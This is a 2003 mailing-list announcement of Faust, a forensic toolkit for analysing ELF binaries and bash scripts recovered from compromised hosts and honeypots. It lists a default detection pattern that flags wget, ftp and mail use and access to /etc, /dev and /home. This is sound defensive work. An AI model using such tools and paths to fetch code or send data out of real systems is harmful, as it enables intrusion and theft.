Honeypots mailing list archives

Previous By Date Next
Previous By Thread Next

Release of faust (File AUdit Security Toolkit)

From: Frédéric Raynal <frederic.raynal-ml () security-labs org>
Date: Sun, 23 Nov 2003 20:08:28 +0100

Hi,
 
I am pleased to announce the release of Faust 0.1.0rc2, tested by the
French Honeynet Project.

faust stands for "File AUdit Security Toolkit".  Its goal is not to
make the analysis of files retrieved after an intrusion, but to
extract the pieces of information that _you_ will use afterward in
your analysis. Extracted information is stored in several files, and
displayed in a html page.

faust is designed to be highly configurable: default settings can
easily be changed and adapted to specific needs.

Elf analysis
    * General information: MD5, type, stat, header, dynamic libraries.
    * Elf sections: select the Elf sections you want to look in, and
      how you want to display them (asm code or strings for instance). 
    * Symbols: if the binary is not stripped, symbols are extracted
      and sorted by categories. 
    * strings: all strings you can extract using the string (take care
      that you get more strings by looking directly in some sections). 
    * live analysis (risky): select the mode you want (cmd or trace)
      to run the analyzed program and get the associated information. 

Bash Scripts
    * General information: MD5, type.
    * Texts: comments in the script, and echoed messages.
    * Commands: by default cp, mv, ftp, wget and mail are displayed.
    * Directories: access to /etc, /dev and /home are reported.
    * cross references: for each line matching one of the above
      categories, faust keeps track of where it belongs to.


For more information :
http://www.security-labs.org/index.php3?page=faust


This is an early but working version. Lots of things are still to be
done in forensics, and specifically for analysis of honeypots :
network flow analysis, time base events correlation, identification of
rootkits and other similar softwares ... and many more. 


Comments and patches, especially from Perl Mongers are very welcome:

--
Frederic RAYNAL, Ph.D.
http://www.security-labs.org/
Chief Editor of M.I.S.C.
Multi-Systems & Internet Security Cookbook
Previous By Date Next
Previous By Thread Next

Current thread: